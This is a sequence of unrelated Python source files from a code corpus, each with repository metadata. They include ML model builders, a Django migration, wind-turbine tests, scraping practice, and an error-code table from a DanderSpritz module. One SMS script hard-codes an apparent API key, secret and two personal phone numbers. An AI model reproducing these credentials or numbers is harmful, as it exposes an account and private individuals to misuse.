axs1 = [plt.subplot(i) for i in chroms]
sliders = gs.GridSpec(nfiles, 1)
sliders.update(**SLIDER)
axs2 = [plt.subplot(i) for i in sliders]
colorbars = gs.GridSpec(1, nfiles)
colorbars.update(**CBAR)
axs3 = [plt.subplot(i) for i in colorbars]
# One checkbox axis per file, placed on the grid diagonal.
checks = gs.GridSpec(nfiles, nfiles)
checks.update(**CHECKS)
axs4 = [plt.subplot(checks[i, i]) for i in range(nfiles)]
# Sliders and check boxes do not need tick marks.
for ax in axs2 + axs4:
    ax.set_xticks([])
    ax.set_yticks([])
plt.show()
|
[
"[email protected]"
] | |
6fbab4480a4dbe295810065fd70027aba431136e
|
65fcf07ea6d6dfe0c5a4090343b098807e075010
|
/app/send_sms.py
|
ddf1616e9f2939a4869869007f444ac64bf91988
|
[] |
no_license
|
parkhongbeen/study_selenium
|
0e7e0bc23809c57c29d5352e2ee81b9a74060026
|
f1bdfd3c3aa3299791cc53363eea0a811c6dcedc
|
refs/heads/master
| 2021-04-20T11:27:39.522904 | 2020-03-26T12:54:59 | 2020-03-26T12:54:59 | 249,679,396 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 381 |
py
|
from sdk.api.message import Message

# SECURITY: real API credentials should not be hard-coded in source;
# load them from environment variables or a config file instead.
api_key = "NCSGLMHSQ2FTVZUA"
api_secret = "LCSOKSWPDNLZF971PMZ4XAQPZPYD60EW"

# SMS parameters: message type, recipient, sender and body.
params = dict()
params['type'] = 'sms'
params['to'] = '01082128997'
params['from'] = '01050022354'
params['text'] = '์ผ ํ๋น์ ๋ด๊ฐ ๋ด์ผ ์ปคํผ์ฌ์ค๊ป'

cool = Message(api_key, api_secret)
try:
    response = cool.send(params)
except Exception as exc:
    # BUG FIX: was a bare 'except:' that silently swallowed everything,
    # including SystemExit/KeyboardInterrupt, and hid the failure reason.
    print('์๋ฌ', exc)
|
[
"[email protected]"
] | |
7734622e41048306a547129450508bf4c50e9f13
|
094627e84a63cdeb97c8917cc6581cc55fa8f583
|
/brl_baselines/deepq/models.py
|
4309da5e793c8494de2fd8a12a042c7a978427f7
|
[
"BSD-3-Clause"
] |
permissive
|
gilwoolee/brl_baselines
|
844f23b31f53648796325d13cb3c252cda0fc55d
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
refs/heads/master
| 2022-11-28T22:31:31.195138 | 2020-08-04T02:17:28 | 2020-08-04T02:17:28 | 278,916,753 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,059 |
py
|
import tensorflow as tf
import tensorflow.contrib.layers as layers
def _mlp(hiddens, input_, num_actions, scope, reuse=False, layer_norm=False):
    """Build a fully connected Q-network graph inside `scope`.

    hiddens: list of hidden-layer sizes; input_: input tensor;
    num_actions: width of the linear output layer (one Q-value per action).
    Returns the Q-value tensor.
    """
    with tf.variable_scope(scope, reuse=reuse):
        out = input_
        for hidden in hiddens:
            out = layers.fully_connected(out, num_outputs=hidden, activation_fn=None)
            if layer_norm:
                # Layer normalization before the nonlinearity
                # (https://arxiv.org/abs/1607.06450).
                out = layers.layer_norm(out, center=True, scale=True)
            out = tf.nn.relu(out)
        # Final linear layer: one Q-value per action, no activation.
        q_out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
        return q_out
def mlp(hiddens=[], layer_norm=False):
    """This model takes as input an observation and returns values of all actions.

    Parameters
    ----------
    hiddens: [int]
        list of sizes of hidden layers
    layer_norm: bool
        if true applies layer normalization for every layer
        as described in https://arxiv.org/abs/1607.06450

    Returns
    -------
    q_func: function
        q_function for DQN algorithm.
    """
    # Close over the configuration; graph-building args are supplied later.
    def q_func(*args, **kwargs):
        return _mlp(hiddens, layer_norm=layer_norm, *args, **kwargs)
    return q_func
def _cnn_to_mlp(convs, hiddens, dueling, input_, num_actions, scope, reuse=False, layer_norm=False):
    """Build a conv stack followed by fully connected Q-value head(s).

    convs: list of (num_outputs, kernel_size, stride) tuples;
    dueling: when True, add a separate state-value head and combine it
    with mean-centered action advantages. Returns the Q-value tensor.
    """
    with tf.variable_scope(scope, reuse=reuse):
        out = input_
        with tf.variable_scope("convnet"):
            for num_outputs, kernel_size, stride in convs:
                out = layers.convolution2d(out,
                                           num_outputs=num_outputs,
                                           kernel_size=kernel_size,
                                           stride=stride,
                                           activation_fn=tf.nn.relu)
        conv_out = layers.flatten(out)
        with tf.variable_scope("action_value"):
            action_out = conv_out
            for hidden in hiddens:
                action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
                if layer_norm:
                    action_out = layers.layer_norm(action_out, center=True, scale=True)
                action_out = tf.nn.relu(action_out)
            # Linear layer: one advantage/Q score per action.
            action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
        if dueling:
            with tf.variable_scope("state_value"):
                state_out = conv_out
                for hidden in hiddens:
                    state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
                    if layer_norm:
                        state_out = layers.layer_norm(state_out, center=True, scale=True)
                    state_out = tf.nn.relu(state_out)
                state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
            # Dueling combination: Q = V(s) + (A(s,a) - mean_a A(s,a)).
            action_scores_mean = tf.reduce_mean(action_scores, 1)
            action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
            q_out = state_score + action_scores_centered
        else:
            q_out = action_scores
        return q_out
def cnn_to_mlp(convs, hiddens, dueling=False, layer_norm=False):
    """This model takes as input an observation and returns values of all actions.

    Parameters
    ----------
    convs: [(int, int, int)]
        list of convolutional layers in form of
        (num_outputs, kernel_size, stride)
    hiddens: [int]
        list of sizes of hidden layers
    dueling: bool
        if true double the output MLP to compute a baseline
        for action scores
    layer_norm: bool
        if true applies layer normalization for every layer
        as described in https://arxiv.org/abs/1607.06450

    Returns
    -------
    q_func: function
        q_function for DQN algorithm.
    """
    # Close over the architecture; graph-building args are supplied later.
    def q_func(*args, **kwargs):
        return _cnn_to_mlp(convs, hiddens, dueling, layer_norm=layer_norm, *args, **kwargs)
    return q_func
def build_q_func(network, hiddens=[24], dueling=False, layer_norm=False, **network_kwargs):
    """Return a q_func_builder(input_placeholder, num_actions, scope, reuse).

    network: a callable mapping the input placeholder to a latent tensor,
    or the name of a registered baselines network (resolved lazily).
    NOTE(review): the hidden-layer/layer_norm head is commented out below,
    so `hiddens` and `layer_norm` currently have no effect — the Q head is
    a single linear layer on the network's flattened latent output.
    """
    if isinstance(network, str):
        # Lazy import keeps baselines optional until a string name is used.
        from baselines.common.models import get_network_builder
        network = get_network_builder(network)(**network_kwargs)
    def q_func_builder(input_placeholder, num_actions, scope, reuse=False):
        """Build the Q-value graph for one scope; returns the Q tensor."""
        with tf.variable_scope(scope, reuse=reuse):
            print("Scope", scope, reuse, input_placeholder)
            latent = network(input_placeholder)
            if isinstance(latent, tuple):
                # Recurrent networks return (latent, state); state unsupported.
                if latent[1] is not None:
                    raise NotImplementedError("DQN is not compatible with recurrent policies yet")
                latent = latent[0]
            latent = layers.flatten(latent)
            with tf.variable_scope("action_value"):
                action_out = latent
                # for hidden in hiddens:
                #     action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
                #     if layer_norm:
                #         action_out = layers.layer_norm(action_out, center=True, scale=True)
                #     action_out = tf.nn.relu(action_out)
                action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
            if dueling:
                with tf.variable_scope("state_value"):
                    state_out = latent
                    # for hidden in hiddens:
                    #     state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
                    #     if layer_norm:
                    #         state_out = layers.layer_norm(state_out, center=True, scale=True)
                    #     state_out = tf.nn.relu(state_out)
                    state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
                # Dueling combination: Q = V(s) + (A(s,a) - mean_a A(s,a)).
                action_scores_mean = tf.reduce_mean(action_scores, 1)
                action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
                q_out = state_score + action_scores_centered
            else:
                q_out = action_scores
        return q_out
    return q_func_builder
|
[
"[email protected]"
] | |
a28750d60b8ec5ca5296f66052472828b084a86a
|
293763954ad29020d68d17bb20b2ac8ce09b2412
|
/Learning & Documentation/Create Models in Tensorflow/linear_regression.py
|
de2ef0001bad013224eaa176c22b37be896378d2
|
[
"MIT"
] |
permissive
|
grebtsew/Object-and-facial-detection-in-python
|
b4371d86ca1b997c310c961b4eeb975af42a8f78
|
4ef987f1de7509876ca1e3588b2d6f4afaef2a75
|
refs/heads/master
| 2023-03-30T16:52:07.192025 | 2022-07-29T16:00:50 | 2022-07-29T16:00:50 | 122,378,661 | 17 | 5 |
MIT
| 2023-03-25T01:49:15 | 2018-02-21T18:52:07 |
Python
|
UTF-8
|
Python
| false | false | 3,681 |
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear regression using the LinearRegressor Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import imports85 # pylint: disable=g-bad-import-order
STEPS = 1000
PRICE_NORM_FACTOR = 1000
def main(argv):
    """Build, train, and evaluate a LinearRegressor on the imports85 data.

    Trains on curb weight and highway mpg to predict car price (rescaled
    to thousands of dollars for better convergence), prints RMSE on the
    held-out split, then prints predictions for two sample cars.

    Fixed: debugging leftovers (`print(train)`, `print(test)`, `exit(0)`
    and progress prints) short-circuited the function right after loading
    the dataset, making all training/evaluation code below dead.
    """
    # assert len(argv) == 1
    (train, test) = imports85.dataset()

    # Switch the labels to units of thousands for better convergence.
    def to_thousands(features, labels):
        return features, labels / PRICE_NORM_FACTOR

    train = train.map(to_thousands)
    test = test.map(to_thousands)

    # Build the training input_fn.
    def input_train():
        return (
            # Shuffling with a buffer larger than the data set ensures
            # that the examples are well mixed.
            train.shuffle(1000).batch(128)
            # Repeat forever
            .repeat().make_one_shot_iterator().get_next())

    # Build the validation input_fn.
    def input_test():
        return (test.shuffle(1000).batch(128)
                .make_one_shot_iterator().get_next())

    feature_columns = [
        # "curb-weight" and "highway-mpg" are numeric columns.
        tf.feature_column.numeric_column(key="curb-weight"),
        tf.feature_column.numeric_column(key="highway-mpg"),
    ]

    # Build the Estimator.
    model = tf.estimator.LinearRegressor(feature_columns=feature_columns)

    # Train the model.
    # By default, the Estimators log output every 100 steps.
    model.train(input_fn=input_train, steps=STEPS)

    # Evaluate how the model performs on data it has not yet seen.
    eval_result = model.evaluate(input_fn=input_test)

    # The evaluation returns a Python dictionary. The "average_loss" key
    # holds the Mean Squared Error (MSE), in (thousands of dollars)^2.
    average_loss = eval_result["average_loss"]

    # Convert MSE to Root Mean Square Error (RMSE), back in dollars.
    print("\n" + 80 * "*")
    print("\nRMS error for the test set: ${:.0f}"
          .format(PRICE_NORM_FACTOR * average_loss**0.5))

    # Run the model in prediction mode.
    input_dict = {
        "curb-weight": np.array([2000, 3000]),
        "highway-mpg": np.array([30, 40])
    }
    predict_input_fn = tf.estimator.inputs.numpy_input_fn(
        input_dict, shuffle=False)
    predict_results = model.predict(input_fn=predict_input_fn)

    # Print the prediction results.
    print("\nPrediction results:")
    for i, prediction in enumerate(predict_results):
        msg = ("Curb weight: {: 4d}lbs, "
               "Highway: {: 0d}mpg, "
               "Prediction: ${: 9.2f}")
        msg = msg.format(input_dict["curb-weight"][i], input_dict["highway-mpg"][i],
                         PRICE_NORM_FACTOR * prediction["predictions"][0])
        print("    " + msg)
    print()


if __name__ == "__main__":
    # The Estimator periodically generates "INFO" logs; make these logs visible.
    tf.logging.set_verbosity(tf.logging.INFO)
    tf.app.run(main=main)
|
[
"[email protected]"
] | |
4e0dade735408ec02614201f3dce6b1d129075a7
|
a518141ca3ba2b6fa63a7961b51936d9438ff022
|
/10812 - Beat the Spread!.py
|
5d9944100b2a7760d5decf4054a94f3decb2b9c7
|
[] |
no_license
|
jlhung/UVA-Python
|
ec93b2c98e04c753e8356f3e4825584fae4a8663
|
7a0db4fecffd7ac4f377f93da41291a8e998ee9b
|
refs/heads/master
| 2022-11-28T04:47:49.270187 | 2020-08-10T13:19:58 | 2020-08-10T13:19:58 | 116,969,745 | 19 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
def spread_scores(total, diff):
    """Return the (winner, loser) scores whose sum is *total* and whose
    difference is *diff*, or None when no non-negative integer pair fits.

    Fixed: the original printed ``int((x+y) / 2)`` — true division goes
    through a float and silently loses precision for large inputs; integer
    floor division is exact.
    """
    # Impossible when the parity is wrong or either score would be negative.
    if (total + diff) % 2 or (total + diff) < 0 or (total - diff) < 0:
        return None
    return (total + diff) // 2, (total - diff) // 2


def main():
    """Read the case count, then one 'sum difference' pair per line."""
    n = int(input())
    while n:
        x, y = map(int, input().split())
        scores = spread_scores(x, y)
        if scores is None:
            print("impossible")
        else:
            print(scores[0], scores[1])
        n -= 1


if __name__ == "__main__":
    main()
|
[
"[email protected]"
] | |
62085bac7af2c75ef4995d947ebe57ef7dcf9cb2
|
44a2741832c8ca67c8e42c17a82dbe23a283428d
|
/cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6CaloJetSequence_pPb_mix_cff.py
|
43faa9de8f5e464f8f33daa997f0ff65a0071833
|
[] |
no_license
|
yenjie/HIGenerator
|
9ff00b3f98b245f375fbd1b565560fba50749344
|
28622c10395af795b2b5b1fecf42e9f6d4e26f2a
|
refs/heads/master
| 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,457 |
py
|
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
# PAT sequence for anti-kT R=0.6 calorimeter jets (pPb MC "mix" workflow).

# Match reconstructed ak6Calo jets to cleaned heavy-ion gen jets.
ak6Calomatch = patJetGenJetMatch.clone(
    src = cms.InputTag("ak6CaloJets"),
    matched = cms.InputTag("ak6HiGenJetsCleaned")
    )

# Match reconstructed jets to generator-level partons.
ak6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("ak6CaloJets"),
                                        matched = cms.InputTag("hiGenParticles")
                                        )

# Jet energy corrections: L2Relative + L3Absolute with the HI AK6Calo payload.
ak6Calocorr = patJetCorrFactors.clone(
    useNPV = False,
#    primaryVertices = cms.InputTag("hiSelectedVertex"),
    levels   = cms.vstring('L2Relative','L3Absolute'),
    src = cms.InputTag("ak6CaloJets"),
    payload = "AK6Calo_HI"
    )

# PAT jet producer: embeds gen matches; b-tagging, tracks, charge, jet ID
# and MC flavour are all switched off.
ak6CalopatJets = patJets.clone(jetSource = cms.InputTag("ak6CaloJets"),
                               jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6Calocorr")),
                               genJetMatch = cms.InputTag("ak6Calomatch"),
                               genPartonMatch = cms.InputTag("ak6Caloparton"),
                               jetIDMap = cms.InputTag("ak6CaloJetID"),
                               addBTagInfo = False,
                               addTagInfos = False,
                               addDiscriminators = False,
                               addAssociatedTracks = False,
                               addJetCharge = False,
                               addJetID = False,
                               getJetMCFlavour = False,
                               addGenPartonMatch = True,
                               addGenJetMatch = True,
                               embedGenJetMatch = True,
                               embedGenPartonMatch = True,
                               embedCaloTowers = False,
                               embedPFCandidates = False
                               )

# Analyzer configured for MC; also matches against the akVs6Calo collection.
ak6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6CalopatJets"),
                                                genjetTag = 'ak6HiGenJetsCleaned',
                                                rParam = 0.6,
                                                matchJets = cms.untracked.bool(True),
                                                matchTag = 'akVs6CalopatJets',
                                                pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
                                                trackTag = cms.InputTag("generalTracks"),
                                                fillGenJets = True,
                                                isMC = True,
                                                genParticles = cms.untracked.InputTag("hiGenParticles"),
                                                eventInfoTag = cms.InputTag("hiSignal")
                                                )

# MC chain: gen-jet match -> parton match -> JEC -> PAT jets -> analyzer.
ak6CaloJetSequence_mc = cms.Sequence(
    ak6Calomatch
    *
    ak6Caloparton
    *
    ak6Calocorr
    *
    ak6CalopatJets
    *
    ak6CaloJetAnalyzer
    )

# Data chain: no generator information, so JEC -> PAT jets -> analyzer only.
ak6CaloJetSequence_data = cms.Sequence(ak6Calocorr
                                       *
                                       ak6CalopatJets
                                       *
                                       ak6CaloJetAnalyzer
                                       )

# The JEC and mixed-MC variants reuse the full MC sequence.
ak6CaloJetSequence_jec = ak6CaloJetSequence_mc
ak6CaloJetSequence_mix = ak6CaloJetSequence_mc

ak6CaloJetSequence = cms.Sequence(ak6CaloJetSequence_mix)
|
[
"[email protected]"
] | |
0ff42ffdcd69c859b093f5e2f320ba03debf77c8
|
fea9e7fc8b5ae1752a8917f415ddfcadc62ae540
|
/practice/week2/css-selector/sel_books.py
|
9e571bd96e24c0ce80be33267c1c92621b9eed3f
|
[] |
no_license
|
Dadajon/dl-with-big-data
|
fc85e0dd13aa857b89c9b707faabcfc69b51fe24
|
8e7b543948be0773550a114dc6467627c88e445f
|
refs/heads/main
| 2023-07-26T05:43:02.901241 | 2021-09-09T06:09:43 | 2021-09-09T06:09:43 | 328,919,918 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 564 |
py
|
from bs4 import BeautifulSoup

# Parse the sample document once.  Fixed: the original left the file
# handle open; `with` guarantees it is closed (BeautifulSoup consumes
# the file during construction, so nothing reads it afterwards).
with open("books.html", encoding="utf-8") as fp:
    soup = BeautifulSoup(fp, "html.parser")


def sel(query):
    """Print the string content of the first node matching the CSS selector.

    (Was a lambda bound to a name; a def is the idiomatic form, PEP 8 E731.)
    """
    print(soup.select_one(query).string)


sel("#nu")                # look up by id
sel("li#nu")              # by tag and id
sel("ul > li#nu")         # parent tag, then tag and id
sel("#bible #nu")         # id anywhere under another id
sel("#bible > #nu")       # id as a direct child of another id
sel("ul#bible > li#nu")   # fully qualified parent/child selectors
sel("li[id='nu']")        # attribute selector
sel("li:nth-of-type(4)")  # positional pseudo-class

print(soup.select("li")[3].string)
print(soup.find_all("li")[3].string)
|
[
"[email protected]"
] | |
4dd2952b692d1eb7f9535151212982a8483654d6
|
0bf183f870d39037a254695b163c833512a826f8
|
/wapps/migrations/0016_auto_20161024_0925.py
|
5799f374b78a09d39052c63d158a41562f899572
|
[
"MIT"
] |
permissive
|
apihackers/wapps
|
47c57a762aec89bc398a152763a2b26005d8ffdc
|
e8158747aa3d77246d41142580faf9a5f2b0d968
|
refs/heads/master
| 2022-06-19T19:40:28.615502 | 2018-05-02T12:42:51 | 2018-05-02T12:42:51 | 59,942,417 | 7 | 2 |
MIT
| 2022-05-21T21:45:25 | 2016-05-29T12:40:01 |
Python
|
UTF-8
|
Python
| false | false | 723 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-24 09:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from wapps.utils import get_image_model
class Migration(migrations.Migration):
    # Auto-generated schema migration (Django 1.10): re-declares the
    # IdentitySettings.amp_logo foreign key (help text, SET_NULL, related_name).

    dependencies = [
        ('wapps', '0015_identitysettings_amp_logo'),
    ]

    operations = [
        migrations.AlterField(
            model_name='identitysettings',
            name='amp_logo',
            # NOTE(review): `to=get_image_model()` is evaluated at import
            # time; presumably it returns the project's image model label —
            # confirm it is stable across settings configurations.
            field=models.ForeignKey(blank=True, help_text='An mobile optimized logo that must be 600x60', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=get_image_model(), verbose_name='Mobile Logo'),
        ),
    ]
|
[
"[email protected]"
] | |
12a314df473b007e01fcd646a5de9d22189aca4b
|
9b7d1472086eed304320312043a95610a39baf9c
|
/easy_maps/migrations/0001_initial.py
|
63a5e3ffb746437d92af2bbe813d7a74e7c6e4bc
|
[
"MIT"
] |
permissive
|
duct-tape/django-easy-maps
|
1831785952c5ef40028197d5ab618074b5a6053a
|
790196fcb5652a76a64f7f513c4c4ef4a1c905df
|
refs/heads/master
| 2020-05-28T05:14:18.312914 | 2019-04-21T04:40:29 | 2019-04-21T04:40:29 | 188,890,561 | 0 | 0 |
MIT
| 2019-05-27T18:20:17 | 2019-05-27T18:20:16 | null |
UTF-8
|
Python
| false | false | 1,103 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Initial migration: creates the Address table used as a geocoding cache.

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # The raw address string is the unique cache key.
                ('address', models.CharField(unique=True, max_length=255, verbose_name='address')),
                # Fields below are filled in later (nullable/blank), presumably
                # by the geocoder — confirm against the app's geocoding code.
                ('computed_address', models.CharField(max_length=255, null=True, verbose_name='computed address', blank=True)),
                ('latitude', models.FloatField(null=True, verbose_name='latitude', blank=True)),
                ('longitude', models.FloatField(null=True, verbose_name='longitude', blank=True)),
                ('geocode_error', models.BooleanField(default=False, verbose_name='geocode error')),
            ],
            options={
                'verbose_name': 'EasyMaps Address',
                'verbose_name_plural': 'Address Geocoding Cache',
            },
        ),
    ]
|
[
"[email protected]"
] | |
64ccdd263ca98e95b24a5cf753dcf440d430245d
|
10e1a046d2fb02d0742364c5d2ca3a40f9380416
|
/py_wake/tests/test_windturbines/test_generic_wind_turbines.py
|
0dec1eb35265b6ee19a256e891ed3db51e58c090
|
[
"MIT"
] |
permissive
|
Bowen-Du/PyWake
|
e1c407d4ff20101c95c28cd856faec729b414320
|
9a3c9a85f50082da01286b2dc8551a4e8f5fc037
|
refs/heads/master
| 2023-06-10T20:36:00.213649 | 2021-07-02T11:43:51 | 2021-07-02T13:14:51 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,371 |
py
|
from py_wake.examples.data.hornsrev1 import V80, Hornsrev1Site
from py_wake.wind_turbines._wind_turbines import WindTurbine
from py_wake.wind_turbines.generic_wind_turbines import GenericWindTurbine, GenericTIRhoWindTurbine
from py_wake.examples.data import wtg_path
from py_wake.examples.data.dtu10mw import DTU10MW
import numpy as np
import matplotlib.pyplot as plt
from py_wake.tests import npt
import pytest
from py_wake.deficit_models.noj import NOJ
from py_wake.site.xrsite import XRSite
def test_GenericWindTurbine():
    """GenericWindTurbine power/ct curves should track three reference turbines."""
    # Tuples: (reference turbine, turbulence intensity for the generic curve,
    #          power tolerance as a fraction of rated power, absolute ct tolerance).
    for ref, ti, p_tol, ct_tol in [(V80(), .1, 0.03, .16),
                                   (WindTurbine.from_WAsP_wtg(wtg_path + "Vestas V112-3.0 MW.wtg"), .05, 0.035, .07),
                                   (DTU10MW(), .05, 0.06, .13)]:
        # Rated power estimated as the maximum over 10-19 m/s.
        power_norm = ref.power(np.arange(10, 20)).max()
        wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
                                turbulence_intensity=ti, ws_cutin=None)
        if 0:  # manual inspection plot (disabled)
            u = np.arange(0, 30, .1)
            p, ct = wt.power_ct(u)
            plt.plot(u, p / 1e6, label='Generic')
            plt.plot(u, ref.power(u) / 1e6, label=ref.name())
            plt.ylabel('Power [MW]')
            plt.legend()
            ax = plt.twinx()
            ax.plot(u, ct, '--')
            ax.plot(u, ref.ct(u), '--')
            plt.ylabel('Ct')
            plt.show()
        # Compare only within the 5-24 m/s operating range.
        u = np.arange(5, 25)
        p, ct = wt.power_ct(u)
        p_ref, ct_ref = ref.power_ct(u)
        # print(np.abs(p_ref - p).max() / power_norm)
        npt.assert_allclose(p, p_ref, atol=power_norm * p_tol)
        # print(np.abs(ct_ref - ct).max())
        npt.assert_allclose(ct, ct_ref, atol=ct_tol)
@pytest.mark.parametrize(['power_idle', 'ct_idle'], [(0, 0), (100, .1)])
def test_GenericWindTurbine_cut_in_out(power_idle, ct_idle):
    """Outside the cut-in/cut-out window the turbine reports its idle power/ct."""
    ref = V80()
    power_norm = ref.power(15)
    wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
                            turbulence_intensity=0, ws_cutin=3, ws_cutout=25, power_idle=power_idle, ct_idle=ct_idle)
    if 0:  # manual inspection plot (disabled)
        u = np.arange(0, 30, .1)
        p, ct = wt.power_ct(u)
        plt.plot(u, p / 1e6, label='Generic')
        plt.plot(u, ref.power(u) / 1e6, label=ref.name())
        plt.ylabel('Power [MW]')
        plt.legend()
        ax = plt.twinx()
        ax.plot(u, ct, '--')
        ax.plot(u, ref.ct(u), '--')
        plt.ylabel('Ct')
        plt.show()
    # Just below cut-in (3 m/s) and just above cut-out (25 m/s) the idle
    # values must be returned.
    assert wt.ct(2.9) == ct_idle
    assert wt.power(2.9) == power_idle
    assert wt.ct(25.1) == ct_idle
    assert wt.power(25.1) == power_idle
def test_GenericTIRhoWindTurbine():
    """Power/ct must respond to turbulence intensity and air density inputs."""
    wt = GenericTIRhoWindTurbine('2MW', 80, 70, 2000, )
    # Same wind speed (11 m/s), three turbulence intensities.
    ws_lst = [11, 11, 11]
    ti_lst = [0, .1, .2]
    p11, ct11 = wt.power_ct(ws=ws_lst, TI_eff=ti_lst, Air_density=1.225)
    p11 /= 1e6
    if 0:  # manual inspection plot (disabled)
        u = np.arange(3, 28, .1)
        ax1 = plt.gca()
        ax2 = plt.twinx()
        for ti in ti_lst:
            p, ct = wt.power_ct(u, TI_eff=ti, Air_density=1.225)
            ax1.plot(u, p / 1e6, label='TI=%f' % ti)
            ax2.plot(u, ct, '--')
        ax1.plot(ws_lst, p11, '.')
        ax2.plot(ws_lst, ct11, 'x')
        print(p11.tolist())
        print(ct11.tolist())
        ax1.legend()
        ax1.set_ylabel('Power [MW]')
        ax2.set_ylabel('Ct')
        plt.show()
    # Regression values: higher TI gives lower power and ct at 11 m/s.
    npt.assert_array_almost_equal([1.833753, 1.709754, 1.568131], p11)
    npt.assert_array_almost_equal([0.793741, 0.694236, 0.544916], ct11)
    # Same wind speed (10 m/s), three air densities.
    ws_lst = [10] * 3
    rho_lst = [0.9, 1.225, 1.5]
    p10, ct10 = wt.power_ct(ws=ws_lst, TI_eff=0.1, Air_density=rho_lst)
    p10 /= 1e6
    if 0:  # manual inspection plot (disabled)
        u = np.arange(3, 28, .1)
        ax1 = plt.gca()
        ax2 = plt.twinx()
        for rho in rho_lst:
            p, ct = wt.power_ct(u, TI_eff=0.1, Air_density=rho)
            ax1.plot(u, p / 1e6, label='Air density=%f' % rho)
            ax2.plot(u, ct, '--')
        ax1.plot(ws_lst, p10, '.')
        ax2.plot(ws_lst, ct10, 'x')
        print(p10.tolist())
        print(ct10.tolist())
        ax1.legend()
        ax1.set_ylabel('Power [MW]')
        ax2.set_ylabel('Ct')
        plt.show()
    # Regression values: higher air density gives higher power at 10 m/s.
    npt.assert_array_almost_equal([1.040377569594173, 1.3934596754744593, 1.6322037609434554], p10)
    npt.assert_array_almost_equal([0.7987480617157162, 0.7762418395479502, 0.7282996179383272], ct10)
|
[
"[email protected]"
] | |
01d3ab118c111cade14811b445555a634d2d86f8
|
2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac
|
/Dsz/PyScripts/Lib/dsz/mca/file/cmd/logedit/errors.py
|
9078f31a6058462a9312fcb46aac6150a7228736
|
[] |
no_license
|
FingerLeakers/DanderSpritz_docs
|
f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364
|
d96b6a71c039b329f9f81544f645857c75360e7f
|
refs/heads/master
| 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null |
UTF-8
|
Python
| false | false | 1,344 |
py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: errors.py
import mcl.status

# Status codes for the logedit file command.  ERR_SUCCESS aliases the
# framework-wide success code; each failure code is a unique offset from
# the framework error base (ERR_START).
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 1
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 2
ERR_OPENFILE_FAILED = mcl.status.framework.ERR_START + 3
ERR_ALLOC_FAILED = mcl.status.framework.ERR_START + 4
ERR_WRITE_FILE_FAILED = mcl.status.framework.ERR_START + 5
ERR_UNICODE_NOT_SUPPORTED = mcl.status.framework.ERR_START + 6
ERR_NO_GOOD_LINES_FOUND = mcl.status.framework.ERR_START + 7
ERR_NO_MATCHING_LINES_FOUND = mcl.status.framework.ERR_START + 8

# Human-readable message for each failure code (success has no entry).
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
 ERR_MARSHAL_FAILED: 'Marshaling data failed',
 ERR_GET_FULL_PATH_FAILED: 'Get of full file path failed',
 ERR_OPENFILE_FAILED: 'Open of file failed',
 ERR_ALLOC_FAILED: 'Memory allocation failed',
 ERR_WRITE_FILE_FAILED: 'Write to file failed',
 ERR_UNICODE_NOT_SUPPORTED: 'Unicode is not supported on this platform',
